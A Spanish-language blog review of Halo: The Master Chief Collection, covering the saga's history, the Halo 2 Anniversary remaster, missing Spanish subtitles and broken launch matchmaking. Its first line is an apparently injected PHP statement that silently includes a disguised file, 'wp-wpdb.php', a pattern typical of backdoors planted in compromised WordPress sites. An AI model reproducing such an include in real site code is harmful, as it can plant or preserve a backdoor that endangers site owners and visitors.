if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Halo: The Master Chief Collection – La Fortaleza de LeChuck

Análisis Halo: The Master Chief Collection

Toda compañía de videojuegos tiene una saga que hace que los fans sigan apostando por los nuevos títulos. Muchos de estos jugadores siguen siendo fieles a pesar de los altibajos. Así somos nosotros, los «Haleros», que a pesar de todo seguimos al pie del cañón, deseando saber más del universo de anillos y alienígenas, y ayudando al Jefe Maestro y Cortana en su travesía. El 11 de noviembre desembarcó Halo: The Master Chief Collection, la recopilación de títulos que nos convirtió en fieles seguidores de Halo.

halo_the_master_chief_collection

Un poco de historia

halo_combat_evolvedHace un año, cuando Microsoft anunció su nueva consola llamada Xbox One, los xboxers se echaron las manos a la cabeza por la política de la compañía, tan contraria al jugador, con imposiciones absurdas que fastidiaban la experiencia. Con pena en el alma porque no vería Halo, fue un momento en que decidí que no quería una consola que me obligara a conectarme a internet o pusiera barreras al intercambio. La fuerza de la comunidad hizo reflexionar a la compañía y retiró todos aquellos abusos, incluso el Kinect que incluían todas las consolas. La historia tuvo un final feliz para aquellos que queríamos continuar con la historia del Jefe Maestro, nuestro héroe por el cual estábamos dispuestos a comprar una Xbox One.

Halo es la saga insignia de Microsoft, y junto a su creador, Bungie, ambos construyeron un universo alucinante hace 13 años. De ese mundo salieron cómics, mini series, libros y arte a modo de homenaje de la comunidad: dibujos, relatos, montajes y cosplays. Levantaron una comunidad que haría que después de la primera Xbox se lanzaran a adquirir una 360, para seguir con las aventuras del jefe Maestro y Cortana en su lucha contra el Covenant en Halo 3. FINISH THE FIGHT. El universo majestuoso de Bungie, junto a la prodigiosa banda sonora de Salvatori y O’Donnell, continuó con Halo Reach, una campaña que funcionó estupendamente a pesar de no contar con los dos protagonistas y demostró que Halo tiene la fuerza necesaria para triunfar incluso sin ellos. Con esta maravillosa precuela, Bungie se despidió de una saga que hizo que gente como yo amara los FPS modernos, con un multijugador divertido a la par de competitivo, además de una campaña soberbia.

bungie_halo_reach

La batuta pasó a 343 Industries. Su primera labor fue el remake del primero de la saga, fue así como llegó en 2011 Halo Combat Evolved Anniversary. Lavado de cara para el jefe maestro, con la posibilidad de cambiar entre gráficos clásicos y modernos con tan solo dar un botón. ¿Quién iba a presagiar que después de esta gran labor nos iban a decepcionar? A diferencia de Halo Reach, con Halo 4 no tuvimos beta, íbamos a ciegas a comprar algo que iba a tener un salto gráfico importante y muchos cambios en el multijugador difíciles de digerir. COD hacia años que pegaba muy fuerte y su popularidad influyó en los nuevos chicos de 343, incluyendo novedades de éste en Halo 4, como el sistema de ventajas por rachas, cámara de muerte y selección de armamento antes de comenzar partida. Costaba hacerse a la idea de este cambio tan drástico pero aún así nos manteníamos expectantes, dando el beneficio de la duda al heredero de Bungie. Tras varios meses con el juego, los cambios no encajaron y desde la comunidad llovieron las protestas. El competitivo hacía aguas y los cambios tardaron en producirse. En menos de un año los jugadores de las principales listas de juego no llegaban ni al millar. A pesar de esto, la campaña era interesante, pero se echaba de menos al duo Salvatori y O’Donnell en el apartado musical. En España tuvimos problemas extras con el doblaje y la sincronización que deterioró la experiencia.

halo_the_master_chief_collection_2

Los clásicos de nueva generación

A pesar de batacazo con Halo 4, quería confiar en que 343 escucharía a la comunidad. Vimos las primeras imágenes de Halo 5 en el E3 y la esperanza se apoderó de mí. Para hacer corta la espera de Halo 5, y darle vidilla a la One, Microsoft  anunció la Halo: The Master Chief Collection para Xbox One. Los clásicos Halo 1, Halo 2, Halo 3 y el último de la franquicia, Halo 4, volvían con una nueva imagen y modos para hacer las delicias de los fans y los recién llegados. Alentada por los buenos momentos de Halo 3, mi One (sin Kinect) no tardó en llegar a casa, preparada para recibir aquellos que pusieron los cimientos del universo y el último que se desvió del camino. Halo 2 Anniversary era la gran novedad, la renovación del clásico y el plato fuerte de la compilación, además de ser uno de los favoritos de la comunidad desde siempre. Todos ellos han recibido una inyección de resolución a 1080p y 60FPS y están como nuevos.

halo2_anniverary

Halo: The Master Chief Collection y el nuevo Halo 2 Anniversary

Se llevaba rumoreando desde la salida de Halo CE Anniversary que el próximo por pasar por chapa y pintura sería Halo 2, incluso algunas tiendas lo llegaron a listar con anterioridad. Al final, como vemos, llegó acompañado de todos para vivir la campaña de forma ininterrumpida

Halo 2 Anniversary luce de maravilla, con cinemáticas construidas de nuevo y escenarios a todo detalle. Ahora se pueden visualizar elementos que antes carecían de significado y eran borrosos. Los carteles tienen imágenes y letras visibles, los fondos gozan de animaciones y las luces y sombras te hacen experimentar de forma espectacular las hazañas del Jefe Maestro y Cortana. Como ya sucedió con Halo Combat Evolved Anniversary, al pulsar «select» saltamos de la vista remasterizada a la clásica, apreciando así lo bien que lucía el Halo 2 de 2004, incluso confundiendo en ocasiones los gráficos nuevos con los viejos. Me he pasado minutos sin darme cuenta que estaba en modo clásico, imaginaos que bien se ve Halo 2 aún. En determinadas partes, sobre todo en las de las instalaciones, se puede llegar a disfrutar más en su versión original por el misticismo que ofrecen las luces tenues.

La gran baza de Halo 2 es poder manejar a dos personajes. Viviremos paralelamente la historia del Inquisidor, un elite despojado de su honor que intentará conseguir el perdón de sus superiores, y la del Jefe Maestro, que deberá evitar que el Covenant active el anillo. Ambas tramas confluyen hacia el final, ofreciéndonos un historia soberbia, extensa y con localizaciones que nos harán hacer un alto en el camino para observar el entorno. Si pausamos nuestra travesía, conseguiremos encontrar las diversas terminales, unos ordenadores que nos muestran fragmentos del universo de Halo y que han sido añadidos en este remake, como ya sucedió en Halo CE Anniversary. A través de la descarga de Halo Channel podremos observar estos pedacitos de recuerdos olvidados.

Halo 3 es sin duda mi juego favorito. La historia es apasionante de principio a fin, con gran variedad de escenarios que se vuelven menos repetitivos que los de juegos anteriores. En Halo 3 no sufrimos el efecto «Biblioteca», es decir, cada mapa dispone de localizaciones muy diferentes y no repetitivas como en juegos anteriores. Las fases épicas de Halo 3 se fusionan con la música que alcanza cotas nunca vistas, lo que jugar se convierte en una experiencia emocionante.

Lost in Translation

halo_2_neutroEs de sobra conocido el desafortunado incidente con el doblaje de Halo 2. Como muchos recordaréis, Halo 2 tuvo en su día doblaje «neutro», pero todos sabemos que es puramente latino, con cierto vocabulario que se hace extraño para gente de nuestro país, y por esta razón fue doblemente criticado. Al principio, Halo 2 Anniversary iba a venir solo en inglés, lo que levantó la ira de la comunidad que  finalmente logró que Xbox España se replantease su decisión, y anunciara que Halo 2 Anniversary dispondría de subtítulos en castellano. Todos nos quedamos conformes, hasta que los días previos al lanzamiento nos enteramos por jugadores que no era tan bonito como lo pintaban. Halo 2 anniversary solo incluye subtítulos en castellano durante las cinemáticas, pero al jugar, comprobamos que lamentablemente en TODAS se han colado frases en inglés. Esto obviamente no nos ha gustado, y aunque desde Xbox España han pedido disculpas, todos esperamos un parche que solucione el asunto.

Como he dicho, en ingame no disponemos de subtítulos, es decir, que si no tenemos un buen nivel de inglés vamos a sentirnos un poco perdidos en pantallas donde debemos destruir y activar ciertos elementos. Por suerte, podemos dar al «start» y repasar los objetivos de la misión, pero a veces no resultará del todo esclarecedor. Por no hablar de los diálogos de los miembros de la UNSC, el Convenant, o la mismísima Cortana que nos perdemos.

Matchmaking K.O

Hace más de una semana del lanzamiento de Halo MCC y pocos han podido disfrutar del multijugador competitivo. Cosas como búsquedas interminables de partidas, lag, caída de jugadores, etc. han hecho desesperar a la comunidad. 343 Industries dijo que estaba entre sus prioridades arreglarlo de forma inmediata pero no ha sido así incluso después de sacar el primer parche. El día del lanzamiento muchos de nosotros íbamos a recuperar una parte del ayer, dándole utilidad real a esa Xbox One que esperaba un juego así como agua de mayo. Sin embargo, la decepción se sumaba día tras día y los esfuerzos de 343 no han dado sus frutos. Solo el multijugador competitivo supone el motivo de compra de un gran número de seguidores, que se decantan por jugar contra otros jugadores, y aún no han podido disfrutarlo. Hoy está previsto que salga el parche definitivo, veremos si de una vez por todas funciona mejor, porque realmente queremos jugar.

El apartado de Matchmaking está dividido por juego. Al entrar en la partida se vota un modo + mapa de los 3 que aparecen, esto mezcla partidas de asesino y objetivos, algo no a gusto de todos, y se espera que en un futuro se actualice para que sea más preciso a las preferencias del jugador. Hay otros modos como los equipos grandes o el Swat pero de momento han sido desactivados por los problemas actuales. No puedo decir mucho más allá en este apartado, las pocas partidas que he jugado me han hecho darme cuenta de lo desentrenada que estoy en Halo después de acostumbrarme a Destiny, y aún estoy buscando la configuración del mando ideal. Recuerdo que siempre he utilizado la «Recon» pero noto que ha sufrido una variación y no me funciona como antes. En cuanto a los escenarios, ha sido bonito revisitarlos con gráficos renovados, y utilizar aquellas armas míticas. La primera pegata (granada de plasma) y ver al jugador contrario salir volando siempre es algo grato. En Halo 2 nació el matchmaking, el competitivo de Halo. Los mapas se pueden jugar en versión original o remasterizada, con varios modos de juegos para todos los gustos y jugadores. Muchos de esos mapas fueron exportados a Halo 3 y Reach, así que allí veremos otras versiones de ellos.

halo_the_master_chief_collection_3

Para los que nunca hayáis probado el multijugador competitivo de Halo, estamos ante unos juegos con escenarios pequeños, 5v5 y 4v4, con armas y granadas repartidas por el mapa. Es fácil toparse con el enemigo, por lo que tendremos que dar lo mejor de nosotros y apuntar bien para acabar con su vida, no bastan 3 o 4 tiros mal dados. En Halo 4, como ya he comentado, la cosa a tomado otro camino más COD, con más facilidades para el novato. Juegos rápidos, dinámicos y sin posibilidad de «campeo». La sensación es muy distinta a la de cualquier otro FPS, así que lo mejor es probarlo o al menos echar un vistazo a los numerosos gameplays que abundan en la red.

Conclusiones

Halo: The Master Chief Collection ha tenido un lanzamiento enturbiado por los cientos de problemas del mutijugador, algo fundamental en estos títulos. Además, se han visto videos de la futura beta de Halo 5 que llegará el 27 de diciembre y han creado desconfianza entre los más veteranos. Y en medio de esta vorágine aquí me encuentro yo, echando mano de mi infinita paciencia, con mi esperanza puesta en ese parche milagroso.

Problemas aparte, Halo: The Master Chief Collection es una buena recopilación para rejugar o descubrir un FPS con historia, carisma y con un universo maravilloso. Al volver a ponerme a los mandos, he rememorado aquel sentimiento de hace unos años, y es que la complejidad del mundo de Halo ofrece una atracción como pocos shooters consiguen hacerlo. Halo es una de esas sagas que crean comunidad, con jugadores que demuestran su amor por los juegos y continuamente intentan remar hacia delante para que la saga vaya a mejor y no se hunda. Son cientos los mensajes de jugadores veteranos que dejan sus sugerencias y consejos en los foros oficiales, para que Halo siga gozando de ese renombre, y ciertamente eso no lo consigue cualquier juego.